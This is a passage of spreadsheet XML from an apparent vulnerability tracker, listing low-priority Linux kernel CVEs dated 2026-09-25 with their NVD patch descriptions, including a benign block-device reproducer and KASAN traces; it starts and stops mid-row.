          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q286" s="5" t="inlineStr"/>
      <c r="R286" s="5" t="inlineStr"/>
      <c r="S286" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv4: fib: bound automatic table ID allocation
fib_empty_table() probes every table ID from 1 until it finds a
free one.  IPv4 tables are stored in a 256-bucket hash table, so a
dense set of IDs makes each probe walk a growing hash chain while
RTNL is held.
Automatic table assignment ("ip rule ... table 0") is an IPv4-only
legacy path.  Bound the automatically allocated ID to 4096 so the
RTNL hold stays bounded, without changing lookups of explicitly
specified table IDs.
This changes user-visible behavior.  A table-0 rule previously
received the lowest free ID in 1..RT_TABLE_MAX (0xFFFFFFFF).  After
this patch the search stops at 4096 and the rule add fails with
ENOBUFS if that range is fully occupied.  Explicit table IDs above
4096 remain usable.
The automatic path is unused in practice: it is IPv4-only, not
documented by ip-rule, uncovered by kernel selftests, and both
NetworkManager and systemd refuse table 0.</t>
        </is>
      </c>
      <c r="T286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97598</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97600</t>
        </is>
      </c>
      <c r="D287" s="5" t="inlineStr"/>
      <c r="E287" s="5" t="inlineStr"/>
      <c r="F287" s="5" t="inlineStr"/>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="inlineStr"/>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K287" s="5" t="inlineStr"/>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q287" s="5" t="inlineStr"/>
      <c r="R287" s="5" t="inlineStr"/>
      <c r="S287" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ieee802154: cc2520: fix FIFOP work use-after-free
The FIFOP interrupt handler queues cc2520_fifop_irqwork.  On removal,
cc2520_remove() only flushes the work.  The devm-managed FIFOP IRQ
remains active until after -&gt;remove() returns and can queue the work
again after that flush, allowing it to run after the private data is
released.
Disable the work with disable_work_sync() instead of flushing it, so
the handler can no longer queue it once removal begins.  Destroy the
buffer mutex last, since the worker and the stop callback invoked
through ieee802154_unregister_hw() both take it.
Found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="T287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97600</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97603</t>
        </is>
      </c>
      <c r="D288" s="5" t="inlineStr"/>
      <c r="E288" s="5" t="inlineStr"/>
      <c r="F288" s="5" t="inlineStr"/>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="inlineStr"/>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K288" s="5" t="inlineStr"/>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q288" s="5" t="inlineStr"/>
      <c r="R288" s="5" t="inlineStr"/>
      <c r="S288" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
idpf: disable DIM work before freeing q_vectors
idpf never drains the Tx/Rx DIM works before freeing the memory they
live in.  tx_dim and rx_dim are embedded in struct idpf_q_vector, they
are queued from the NAPI poll via net_dim(), and idpf_vport_intr_rel()
ends with kfree(rsrc-&gt;q_vectors).  Nothing in the driver cancels them.
idpf_tx_dim_work() and idpf_rx_dim_work() then run on freed memory:
idpf_vport_intr_write_itr() writes the ITR register through
q_vector-&gt;intr_reg.tx_itr / rx_itr, void __iomem pointers loaded out of
the freed q_vector.  No configuration is needed to get there --
IDPF_ITR_IS_DYNAMIC() is defined as (itr_mode) and idpf_vport_alloc()
initialises both modes to IDPF_ITR_DYNAMIC.
Draining after idpf_vport_intr_napi_dis_all() is not enough on its own.
idpf_net_dim() is called from inside the
"if (napi_complete_done(napi, work_done))" branch of the poll, and
napi_complete_done() has already cleared NAPIF_STATE_SCHED by then.
napi_disable_locked() waits only while (val &amp; (NAPIF_STATE_SCHED |
NAPIF_STATE_NPSVC)), so napi_disable() can return while the poll tail is
still queueing the work, and a plain cancel_work_sync() would be
re-armed behind the drain.
Use disable_work_sync(): schedule_work() on a work with a non-zero
disable count is dropped by clear_pending_if_disabled() before
__queue_work() is reached.
Move idpf_init_dim() to idpf_vport_intr_alloc() so the works are
initialised on every path that can reach the drain -- the three
"goto intr_deinit" sites between idpf_vport_intr_init() and
idpf_vport_intr_ena() get there without the enable side having run.
Nothing re-enables them: rsrc-&gt;q_vectors is freed on every exit from
idpf_vport_open() and on every idpf_vport_stop(), so the count dies with
the object.
It is a race, not a deterministic failure -- net_dim() only schedules
once DIM_NEVENTS events have accumulated and the profile index changes.
A KASAN ifup/ifdown loop under load is the way to see it.</t>
        </is>
      </c>
      <c r="T288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97603</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97605</t>
        </is>
      </c>
      <c r="D289" s="5" t="inlineStr"/>
      <c r="E289" s="5" t="inlineStr"/>
      <c r="F289" s="5" t="inlineStr"/>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="inlineStr"/>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr">
        <is>
          <t>tempo</t>
        </is>
      </c>
      <c r="K289" s="5" t="inlineStr"/>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q289" s="5" t="inlineStr"/>
      <c r="R289" s="5" t="inlineStr"/>
      <c r="S289" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
erofs: preserve LZMA decoders on resize failure
The pool-resize path frees each stream's old decoder before allocating
its replacement. If an allocation fails after some streams have already
been replaced, the failed stream is put back on the list with state ==
NULL. z_erofs_lzma_max_dictsize is still advanced as if the whole
pool had been resized.
An existing LZMA mount can select the broken stream and pass
NULL to xz_dec_microlzma_reset(). A retry at the same size also
skip another resize attempt. Since the global maximum was advanced,
thus, the invalid state is left unrepaired.
Allocate each replacement before freeing the old decoder, temporarily
retaining one old decoder during allocation. Stop at the first failure
and advance z_erofs_lzma_max_dictsize only after all streams satisfy
the request.
Record each stream's dictionary capacity so retries can skip streams
already enlarged before a partial failure.</t>
        </is>
      </c>
      <c r="T289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97605</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97615</t>
        </is>
      </c>
      <c r="D290" s="5" t="inlineStr"/>
      <c r="E290" s="5" t="inlineStr"/>
      <c r="F290" s="5" t="inlineStr"/>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="inlineStr"/>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q290" s="5" t="inlineStr"/>
      <c r="R290" s="5" t="inlineStr"/>
      <c r="S290" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: bridge: use option bits for CFM/MRP frame handlers
CFM and MRP register a global br_frame_type whose hlist_node is linked
into the per-bridge frame_type_list when the first MEP/MRP instance is
created. Enabling the protocol on multiple bridges therefore inserts the
same node into multiple lists. Unregistering it on one bridge then
corrupts list state belonging to another.
These handlers can only be installed once per bridge, and they are
uncommon. Track their per-bridge enable state with net_bridge option
bits, which already live on the Rx hot cache line, and dispatch the
matching handler directly from the receive path. Check both bits
together first as an unlikely case.
Remove the generic frame_type_list and br_frame_type helpers, which
have had no other users since CFM and MRP were added. That shrinks
struct net_bridge by 8 bytes and drops the list walk from the fast
path. When neither protocol is compiled in, BR_CFM_MRP_OPTS is 0 and
the compiler prunes the branch.</t>
        </is>
      </c>
      <c r="T290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97615</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97616</t>
        </is>
      </c>
      <c r="D291" s="5" t="inlineStr"/>
      <c r="E291" s="5" t="inlineStr"/>
      <c r="F291" s="5" t="inlineStr"/>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="inlineStr"/>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr">
        <is>
          <t>tempo</t>
        </is>
      </c>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q291" s="5" t="inlineStr"/>
      <c r="R291" s="5" t="inlineStr"/>
      <c r="S291" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: act_api: release all action references on NEWACTION failure
When a batched RTM_NEWACTION request replaces an existing action,
tcf_idr_check_alloc() takes a temporary reference on it. If a later
action fails to initialize, tcf_action_destroy() uses strict release
semantics to clean up the actions initialized so far. For an action
bound to a filter, the strict check returns -EPERM without dropping
the temporary reference.
This error also makes tcf_action_destroy() return before releasing
subsequent entries. Any new action initialized between the bound
action and the failing entry is leaked together with its reserved
IDR slot, preventing reuse of its index.
Use tcf_idr_release() to drop each reference held by the batch without
rejecting bound actions. This allows cleanup to continue through all
initialized entries and preserves the module reference release when
an action is destroyed. Explicit action deletion and flushing retain
their separate bind-count checks.</t>
        </is>
      </c>
      <c r="T291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97616</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97618</t>
        </is>
      </c>
      <c r="D292" s="5" t="inlineStr"/>
      <c r="E292" s="5" t="inlineStr"/>
      <c r="F292" s="5" t="inlineStr"/>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="inlineStr"/>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr">
        <is>
          <t>github</t>
        </is>
      </c>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q292" s="5" t="inlineStr"/>
      <c r="R292" s="5" t="inlineStr"/>
      <c r="S292" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
io_uring/net: don't overconsume buffers when using MSG_TRUNC
When a recv/recvmsg is issued with MSG_TRUNC and the incoming packet is
larger than the provided buffer, the net layer returns the full length
of the packet rather than the number of bytes actually copied into the
buffer.  As a result, io_uring advances more of the provided buffer ring
than was actually filled.  Use the actual filled region size to consume
the buffer, but still return the full size to preserve MSG_TRUNC
semantics.
Take care with multishot, because that seems to already truncate the
consumption based on the available payload size.
This was reported in https://github.com/axboe/liburing/issues/1619.
[axboe: fold in size_t unsigned fix]</t>
        </is>
      </c>
      <c r="T292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97618</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97620</t>
        </is>
      </c>
      <c r="D293" s="5" t="inlineStr"/>
      <c r="E293" s="5" t="inlineStr"/>
      <c r="F293" s="5" t="inlineStr"/>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="inlineStr"/>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K293" s="5" t="inlineStr"/>
      <c r="L293" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q293" s="5" t="inlineStr"/>
      <c r="R293" s="5" t="inlineStr"/>
      <c r="S293" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/xe: Flush LSC untyped L1 dataport cache after rcs/ccs batches
emit_render_cache_flush() sets PIPE_CONTROL0_HDC_PIPELINE_FLUSH to
flush the L2/HDC data cache before fence signalling, but it never
requests a flush of the LSC untyped L1 data cache via the 'Untyped
Data-Port Cache Flush Enable' bit in PIPE_CONTROL DWord0[11].
Per the Bspec, in 3D pipeline mode HDC Pipeline Flush is documented to
also flush/invalidate the untyped L1 cache, but only depending on how
HDC_CHICKEN0[13:11] is programmed. Starting with MTL, this coupling
between HDC Pipeline Flush and the untyped L1 cache flush no longer
holds in practice, regardless of how HDC_CHICKEN0 is programmed, so
relying on it is not safe on newer platforms such as BMG. Mesa's Vulkan
driver (anv) has been assuming the kernel flushes both caches between
submissions, and hit user-visible corruption in apps such as Llama.cpp
because of this gap; it now works around it by flushing both caches
again from userspace at the end of every command buffer.
Correctness between submissions on the same queue is userspace's
responsibility and belongs in Mesa, not the kernel. However, for
security we must ensure stale data can't leak through the untyped L1
dataport cache once memory is reclaimed or evicted, which requires the
KMD to flush it before releasing memory for reuse.
Prior to MTL, HDC_CHICKEN0 could be programmed (as already done for
DG2 via Wa_22010960976/Wa_14013347512) to reliably keep HDC Pipeline
Flush coupled to the untyped L1 cache flush, so those platforms are
unaffected. Mesa's own anv driver found that on MTL the HW
disconnected the two independently of how HDC_CHICKEN0 is programmed,
and could not bring the old behavior back even by writing the register
by hand; see Mesa commit 7c2ff46a4fc3 ("anv: don't prevent L1 untyped
cache flush in 3D mode"). The kernel can't reliably request the flush
from the CS on MTL either, so restrict the new PIPE_CONTROL bit to
GRAPHICS_VERx100 &gt;= 2000 (Xe2 and later), where it can be relied on.
Explicitly set PIPE_CONTROL0_UNTYPED_DATAPORT_CACHE_FLUSH together
with PIPE_CONTROL0_HDC_PIPELINE_FLUSH in emit_render_cache_flush() on
Xe2 and later, so the L1 data cache is known clean before memory is
released for reuse, without depending on undocumented
platform-specific HDC_CHICKEN0 behavior.
Bspec: 56551
(cherry picked from commit 434514b6fe731e873808297c268fc52cdf4a1ce6)</t>
        </is>
      </c>
      <c r="T293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97620</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97899</t>
        </is>
      </c>
      <c r="D294" s="5" t="inlineStr"/>
      <c r="E294" s="5" t="inlineStr"/>
      <c r="F294" s="5" t="inlineStr"/>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="inlineStr"/>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K294" s="5" t="inlineStr"/>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q294" s="5" t="inlineStr"/>
      <c r="R294" s="5" t="inlineStr"/>
      <c r="S294" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/i915: Fix memory leak in query_perf_config_list()
When krealloc() fails, free the original oa_config_ids before returning
to avoid a memory leak.
(cherry picked from commit 9977e9d84f46d4f12ad35fbbc0ec4638554bce87)</t>
        </is>
      </c>
      <c r="T294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97899</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97902</t>
        </is>
      </c>
      <c r="D295" s="5" t="inlineStr"/>
      <c r="E295" s="5" t="inlineStr"/>
      <c r="F295" s="5" t="inlineStr"/>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="inlineStr"/>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr">
        <is>
          <t>aws, gin</t>
        </is>
      </c>
      <c r="K295" s="5" t="inlineStr"/>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q295" s="5" t="inlineStr"/>
      <c r="R295" s="5" t="inlineStr"/>
      <c r="S295" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs: don't return -EINVAL for successful nested thaw
Commit 7366f8b6fc6a ("fs: handle freezing from multiple devices")
replaced the freeze_holders bitmask with per-holder counters to allow
nested freezes. In the bitmask version, a thaw that released a shared
hold while another holder remained returned 0. Since the rework,
thaw_super_locked() drops the freeze reference via freeze_dec() but
then returns -EINVAL when other freezers remain, misinforming the
caller: the thaw did succeed, the superblock just stays frozen for the
remaining holders.
This breaks bdev-initiated freezing. When a filesystem is frozen with
FIFREEZE and additionally frozen via bdev_freeze() -- which nests by
design, see fs_bdev_freeze() -- the subsequent bdev_thaw() receives
-EINVAL from the holder op although its freeze reference was dropped,
and therefore keeps bd_fsfreeze_count elevated. Then device-mapper's
unlock_fs() ignores bdev_thaw()'s return value, so nothing rebalances
the count. After the user's FITHAW and umount, the block device can
never be mounted again:
    dm-1: Can't mount, blockdev is frozen
There is no way for userspace to drop the leaked count; only
destroying the block device (or a reboot) recovers the device.
Reproducer (any kernel since v6.8):
    dmsetup create dut --table "0 $(blockdev --getsz "$DEV") linear $DEV 0"
    mkfs.ext4 /dev/mapper/dut
    mount /dev/mapper/dut /mnt
    fsfreeze --freeze /mnt      # freeze_ucount == 1
    dmsetup suspend dut         # bd_fsfreeze_count == 1, ucount == 2
    dmsetup resume dut          # ucount 2 -&gt; 1, but thaw_super()
                                # returns -EINVAL, so bdev_thaw()
                                # keeps bd_fsfreeze_count at 1
    fsfreeze --unfreeze /mnt    # filesystem thaws fine
    umount /mnt
    mount /dev/mapper/dut /mnt  # EBUSY, forever
The same happens with fsfreeze held across an LVM snapshot of the
origin volume.
fs_bdev_thaw()'s documentation already describes the intended
semantics: "If this function returns zero it doesn't mean that the
filesystem is unfrozen as it may have been frozen multiple times".
Restore them by returning 0 when a nested thaw drops its hold while
other freezers remain. Thawing without holding a freeze still fails
with -EINVAL as may_unfreeze() rejects that case before the reference
count is touched.</t>
        </is>
      </c>
      <c r="T295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97902</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97914</t>
        </is>
      </c>
      <c r="D296" s="5" t="inlineStr"/>
      <c r="E296" s="5" t="inlineStr"/>
      <c r="F296" s="5" t="inlineStr"/>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="inlineStr"/>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K296" s="5" t="inlineStr"/>
      <c r="L296" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q296" s="5" t="inlineStr"/>
      <c r="R296" s="5" t="inlineStr"/>
      <c r="S296" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel: ethosu: Fix ethosu_job_open() return value
A WARN_ON() returns a 0 or 1, not the original negative errno. Just drop
the WARN_ON() as the FD open will pass the return code to userspace and
there's only one possible source of the error (drm_sched_entity_init()).</t>
        </is>
      </c>
      <c r="T296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97914</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97920</t>
        </is>
      </c>
      <c r="D297" s="5" t="inlineStr"/>
      <c r="E297" s="5" t="inlineStr"/>
      <c r="F297" s="5" t="inlineStr"/>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="inlineStr"/>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K297" s="5" t="inlineStr"/>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q297" s="5" t="inlineStr"/>
      <c r="R297" s="5" t="inlineStr"/>
      <c r="S297" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Keep the entry count when the histogram stats allocation fails
print_entries() uses n_entries both as the number of sort entries and as
its own return value, so the -ENOMEM it stores when the stats allocation
fails overwrites the count that the cleanup still needs:
	n_entries = tracing_map_sort_entries(map, ...);
	if (n_entries &lt; 0)
		return n_entries;
	...
			if (!stats) {
				n_entries = -ENOMEM;
				goto out;
			}
	...
 out:
	tracing_map_destroy_sort_entries(sort_entries, n_entries);
tracing_map_destroy_sort_entries() takes an unsigned int and loops up to
it, so -ENOMEM arrives as 4294967284. It walks an array of at most
map-&gt;max_elts pointers and calls destroy_sort_entry(), which dereferences
and frees, on whatever lies past the end.
Reading the hist file of a trigger with a .percent value, with that
allocation forced to fail:
  BUG: KASAN: vmalloc-out-of-bounds in tracing_map_destroy_sort_entries+0xa0/0xb0
  Read of size 8 at addr ffffc90000045000 by task init/1
   tracing_map_destroy_sort_entries+0xa0/0xb0
   hist_show+0x6f7/0x1df0
   seq_read_iter+0x2b8/0x1190
   vfs_read+0x176/0xa40
  The buggy address belongs to a 4-page vmalloc region starting at
  ffffc90000041000 allocated at tracing_map_sort_entries+0x5c/0xd50
A few pages further the fault is fatal. The registers at the oops confirm
the bound: the loop's end pointer less the array start, over the pointer
size, is 4294967284.
Return the error in a separate variable and leave n_entries holding the
count, the way tracing_map_sort_entries() does on its own error path.
The stats block is only entered for a value carrying .percent or .graph,
which __create_val_field() has rejected since v6.3, so this cannot be
reached in mainline as it stands. It becomes reachable again with
"tracing: hist: let values keep the percent and graph modifiers", so it
should be applied first.</t>
        </is>
      </c>
      <c r="T297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97920</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97921</t>
        </is>
      </c>
      <c r="D298" s="5" t="inlineStr"/>
      <c r="E298" s="5" t="inlineStr"/>
      <c r="F298" s="5" t="inlineStr"/>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="inlineStr"/>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q298" s="5" t="inlineStr"/>
      <c r="R298" s="5" t="inlineStr"/>
      <c r="S298" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Free histogram the field rejected for a bad modifier
Writing a hist trigger whose value or variable carries a modifier that is
not allowed there leaks the fields that were built for it.
__create_val_field() takes the field from parse_expr() and stores it in
